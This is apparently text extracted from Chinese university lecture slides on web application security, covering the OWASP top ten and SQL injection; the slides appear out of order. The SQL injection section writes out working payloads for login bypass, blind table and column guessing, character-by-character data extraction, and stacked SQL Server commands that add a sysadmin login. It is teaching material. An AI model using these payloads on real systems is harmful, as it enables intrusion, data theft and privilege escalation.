第7章 Web应用安全攻击

Web应用十大安全漏洞

远程管理漏洞：许多Web应用允许管理者通过Web
接口来对站点实施远程管理。如果这些管理机制没 有得到有效的管理，攻击者就可能通过接口拥有站 点的全部权限。 Web服务器及应用服务器配置不当：对Web应用来 说，健壮的服务器是至关重要的。服务器的配置都 较复杂，比如Apache服务器的配置文件完全是由命 令和注释组成，一个命令包括若干个参数。如果配 置不当对安全性影响最大。
从这个错误提示我们能得到下面几点：


网站使用的是Access数据库，通过JET引擎连接数 据库 程序没有判断客户端提交的数据是否符合程序要求 该SQL语句所查询的表中有一名为ID的字段
示例

如果第一条返回的结果为正常显示，而第二条返回的 结果提示BOF或EOF（程序没做任何判断时）、或提示 找不到记录（判断了rs.eof时）、或显示内容为空（程 序加了on error resume next），表明存在SQL注入漏 洞。


由于or是一个逻辑运算符，在判断多个条件的 时候，只要有一个成立，则等式结果为真。 这样即使我们任意输入了abc与123，由于后边 的一个恒等式的存在而绕过了密码验证，登录 了系统
第二种操作

输入username=admin' --，pwd=11

sql=select * from user where name='admin' --' and pasword='11'

例2：/index.asp?id=01 and (Select Count(username) from Admin)>=0


判断表中是否存在字段名为username。常用 作判断的字段名包括ID、password、pwd、 user_name、uname、address、email、date、 time、Tel等等。 在表名和列名猜解成功后，再使用SQL语句，得 出字段的值。例3为一种最常用的方法：Ascii逐 字解码法

/index.asp?id=01 and (select top 1 asc(mid (username,1,1)) from Admin)>0。用逐步缩小范
围的方法得到第1位字符的ASCII码
SQL注入的实现过程

第三步：实施控制

如果实施注入攻击的数据库是SQL Server， 且数据库用户据具有管理员权限，就可以采 用上文中sp_的相关操作进行管理
SQL注入的检测与防范

过滤特殊字符以及空格，如


username=replace(username, " ’ ", " ") username=replace(input," - "," ") username=replace(input," ; "," ")


过滤关键字，如and、select、update、 insert、delete等 禁止外部提交表单，提交表单时最好使 用POST方式
Web应用十大安全漏洞

跨站脚本漏洞：在远程WEB页面的html代码中插入的具有恶
意目的的数据，用户认为该页面是可信赖的，但是当浏览器 下载该页面，嵌入其中的脚本将被解释执行。最典型的例子 就是论坛处理用户评论的应用程序，这些有跨站脚本漏洞的 应用程序会向客户端返回其他用户先前输入的内容，一些网 站的错误处理页面也存在此类问题。浏览器收到了嵌入恶意 代码的响应，那么这些恶意代码就可能被执行。 缓冲区溢出：Web应用组件没有正确检验输入数据的有效性， 倒是数据溢出，并获得程序的控制权。可能被利用的组件包 括CGI，库文件、驱动文件和Web服务器。 命令注入漏洞：Web应用程序在于外部系统或本地操作系统 交互时，需要传递参数。如果攻击这在传递的参数中嵌入了 恶意代码，外部系统可能会执行那些指令。比如SQL注入攻击， 就是攻击者把SQL命令插入到Web表单的输入域或页面请求的 查询字符串，欺骗服务器执行恶意的SQL命令。


Web应用十大安全漏洞

错误处理问题：在正常操作没有被有效处理的情况下会，会
产生错误提示如内存不够、系统调用失败、网络超时等。如 果攻击者人为构造Web应用不能处理的情况，就可能得到一 些反馈信息，就有可能从中得到系统的相关信息。系统如何 工作这样重要的信息显示出来，并且暴露了那些出错信息背 后的隐含意义。例如，当发出请求包试图判断一个文件是否 在远程主机上存在的时候，如果返回信息为“文件未找到” 则为无此文件，而如果返回信息为“访问被拒绝”则为文件 存在但无访问权限。 密码学使用不当：Web应用经常会使用密码机制来保护信息 存储和传输的安全，比如说开机或文件密码、银行帐号、机 密文件等等。然而这些用以保密用途的程序代码也可能存在 一些安全隐患，这可能是由于开发者的原因造成的
SQL注入的实现过程

例3：已知表Admin中存在username字段。首先，
我们取第一条记录，测试长度：
/index.asp?id=01 and (select top 1 len(username) from Admin)>0

如果top 1的username长度大于0，则条件成立；接着就是 >1、>2、>3测试下去，一直到条件不成立为止，比如>5 成立，>6不成立，那么username的长度为6。 用mid(username,N,1)截取username中第N位字符。再 asc(mid(username,N,1))得到ASCII码，比如：


连接符--表示其后的语句为注释语句，因此后 面的密码验证不会被执行，对access数据库无 效。 本例可以用来探测是否存在用户名为admin （多数情况下默认管理员用户名为admin）。 如果存在，则结果为真。
第三种操作

利用数据库的默认用户DBO，可以进行如下操 作

username= admin';exec master.dbo.sp_addlogin NewUser;-username= admin';exec master.dbo.sp_password null,123,NewUser;-username=admin';exec master.dbo.sp_addsrvrolemember NewUser, sysadmin; --

第一步：寻找SQL注入点


寻找SQL注入点的经典查找方法是在有参数 传人的地方添加诸如”and 1=1”、”and 1=2”以及” ’ ”等一些特殊字符，通过浏 览器所返回的错误信息来判断是否存在SQL 注入。 如果返回错误．则表明程序未对输入的数据 进行处理．绝大部分情况下都能进行注入
示例


Web应用相关技术



CGI技术 ASP技术 PHP技术 JSP技术
Web应用十大安全漏洞

开放Web应用程序安全项目”（OWASP）列出了对 Web应用的危害较大的10个安全问题

未验证参数：Web请求返回的信息没有经过有效性验证就提


交给Web应用程序使用。攻击者可以利用返回信息中的缺陷， 包括URL、请求字符串、cookie头部、表单项，隐含参数传递 代码攻击运行Web程序的组件 访问控制缺陷：用户身份认证策略没有被执行，导致非法用 户可以操作信息。攻击者可以利用这个漏洞得到其他用户帐 号、浏览敏感文件、删除更改内容，执行未授权的访问，甚 至取得网站管理的权限。 帐户及会话管理缺陷：帐户和会话标记未被有效保护。攻击 者可以得到密码、解密密钥、会话Cookie和其它标记，并突破 用户权限限制或利用假身份得到其他用户信任。
SQL注入的检测与防范


屏蔽出错信息 尽量使用复杂和难以猜解的表名和字段 名，不要与用户登录界面里面的各元素 名相似 使用MD5加密数据库密码等敏感信息字 段，即密文=md5(明文)
SQL注入提升权限攻击实例




login.asp （略……………………………………………………………） // 判断用户登录 Sql="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSe x, UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuse r,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPo wer,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,I sChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday " Sql=Sql+" From [XX_User] Where "&sqlstr&"" set rsUser=XXbbs.Execute(sql) If rsUser.eof and rsUser.bof Then ChkUserLogin=false Exit Function Else
判断是否存在表Admin。如果返回结果与 /index.asp?id=01的请求结果相同，说 明表Admin存在，反之，即不存在。如此循环，直至猜到 表名为止。常被采用的表名包括admin、login、subject、 importance、link等等。
SQL注入的实现过程
7.2 SQL注入攻击